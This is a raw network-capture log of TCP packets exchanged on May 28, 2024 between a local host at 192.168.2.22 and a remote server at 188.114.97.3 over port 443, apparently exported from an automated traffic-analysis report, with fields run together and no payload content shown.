                                May 28, 2024 09:30:20.462737083 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.462745905 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.462774992 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.463007927 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.463040113 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.463064909 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.463068962 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.463088036 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.463110924 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.463155031 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.463159084 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.463201046 CEST44349175188.114.97.3192.168.2.22
                                May 28, 2024 09:30:20.463248014 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.489053965 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:20.495268106 CEST49175443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.143265009 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.143310070 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.143388033 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.143667936 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.143687010 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.641277075 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.645983934 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.646002054 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784019947 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784053087 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784094095 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784122944 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.784157991 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784177065 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.784683943 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784714937 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784749031 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.784759045 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.784817934 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.785248995 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.788953066 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.789019108 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.789030075 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878556013 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878602028 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878631115 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878643036 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.878668070 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878684044 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.878707886 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878734112 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878751993 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.878757954 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878770113 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.878802061 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.879188061 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.879229069 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.879256010 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.879268885 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.879277945 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.879313946 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.879322052 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.879331112 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.879373074 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.879381895 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.880287886 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.880311966 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.880335093 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.880337000 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.880348921 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.880382061 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.880386114 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.880424976 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.880434990 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.921654940 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.921710968 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.921722889 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.972723961 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.972768068 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.972790956 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.972793102 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.972820044 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.972841024 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.972871065 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.972913980 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.972923994 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.973660946 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.973716974 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.973727942 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.973762989 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.973803043 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.973807096 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.973815918 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.973850965 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.974512100 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.974524975 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.974572897 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.974679947 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.974728107 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.975399971 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.975456953 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.975553036 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.975605965 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.976260900 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.976315975 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.976489067 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.976541996 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:21.977204084 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:21.977257967 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.016695976 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.016746998 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.016783953 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.016797066 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.016820908 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.016829967 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.016829967 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.016834974 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.016875029 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.016936064 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.067570925 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.067698956 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.067718983 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.067769051 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.067789078 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.068312883 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068361044 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.068372011 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068449974 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068485975 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068495989 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.068506002 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068525076 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.068598032 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068643093 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.068650961 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068774939 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068823099 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.068830013 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.068975925 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069024086 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.069031954 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069046974 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069092035 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.069099903 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069768906 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069817066 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.069825888 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069876909 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069922924 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.069931030 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.069973946 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.070009947 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.070013046 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.070022106 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.070055008 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.070977926 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071010113 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071028948 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.071037054 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071052074 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.071074963 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071115971 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.071124077 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071671009 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071717978 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.071726084 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071835041 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071882963 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.071891069 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071909904 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.071949005 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.071955919 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110379934 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110462904 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110496998 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.110517025 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110532045 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110538006 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.110563040 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110585928 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.110593081 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.110630989 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.110670090 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.110924006 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.111004114 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.111115932 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.111133099 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.111140013 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.111159086 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.162533045 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.162622929 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.162725925 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.162753105 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.162767887 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.163006067 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163052082 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163070917 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.163084984 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163115025 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163126945 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163156033 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.163177013 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.163570881 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163599014 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163636923 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.163645983 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.163661003 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.164463043 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.164488077 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.164525032 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.164534092 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.164557934 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.164907932 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.164927959 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.164968967 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.164980888 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.164997101 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.165750980 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.165771008 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.165826082 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.165836096 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.165865898 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.205493927 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.205516100 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.205653906 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.205694914 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.206056118 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.206074953 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.206111908 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.206124067 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.206140041 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.208843946 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.256644964 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.256675005 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.256758928 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.256782055 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.256810904 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.257680893 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.257705927 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.257761002 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.257786989 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.257811069 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.258095026 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.258112907 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.258181095 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.258181095 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.258200884 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.258661032 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.258683920 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.258723021 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.258740902 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.258754015 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.262212038 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.262232065 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.262278080 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.262286901 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.262300014 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.262664080 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.262686968 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.262736082 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.262762070 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.262784958 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300340891 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.300367117 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.300440073 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300462008 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.300473928 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300484896 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300700903 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.300729036 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.300851107 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300851107 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300851107 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300851107 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.300889015 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.351324081 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.351346970 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.351453066 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.351489067 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.351516008 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.352392912 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352416039 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352453947 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.352458000 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352483988 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352497101 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.352529049 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.352801085 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352819920 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352861881 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.352871895 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.352885008 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.353224039 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.353246927 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.353283882 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.353292942 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.353306055 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.353543997 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.353562117 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.353600979 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.353610039 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.353622913 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.354782104 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.354804039 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.354844093 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.354854107 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.354866028 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.354887962 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.394527912 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.394556046 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.394649982 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.394681931 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.394721985 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.394826889 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.394851923 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.394887924 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.394897938 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.394911051 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.446023941 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446053982 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446293116 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.446293116 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.446366072 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446890116 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446921110 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446928024 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446950912 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.446959972 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446985006 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.446999073 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.447027922 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.447295904 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.447319984 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.447359085 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.447366953 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.447379112 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.447968960 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.447995901 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448035955 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.448044062 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448060036 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.448352098 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448374987 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448416948 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.448427916 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448440075 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.448440075 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.448669910 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448695898 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448731899 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.448740005 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.448751926 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.489067078 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.489094019 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.489132881 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.489155054 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.489168882 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.489168882 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.489500046 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.489526987 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.489557028 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.489566088 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.489588022 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.540719032 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.540746927 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.540807962 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.540849924 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.540868998 CEST49176443192.168.2.22188.114.97.3
                                May 28, 2024 09:30:22.542263031 CEST44349176188.114.97.3192.168.2.22
                                May 28, 2024 09:30:22.542292118 CEST44349176188.114.97.3192.168.2.22
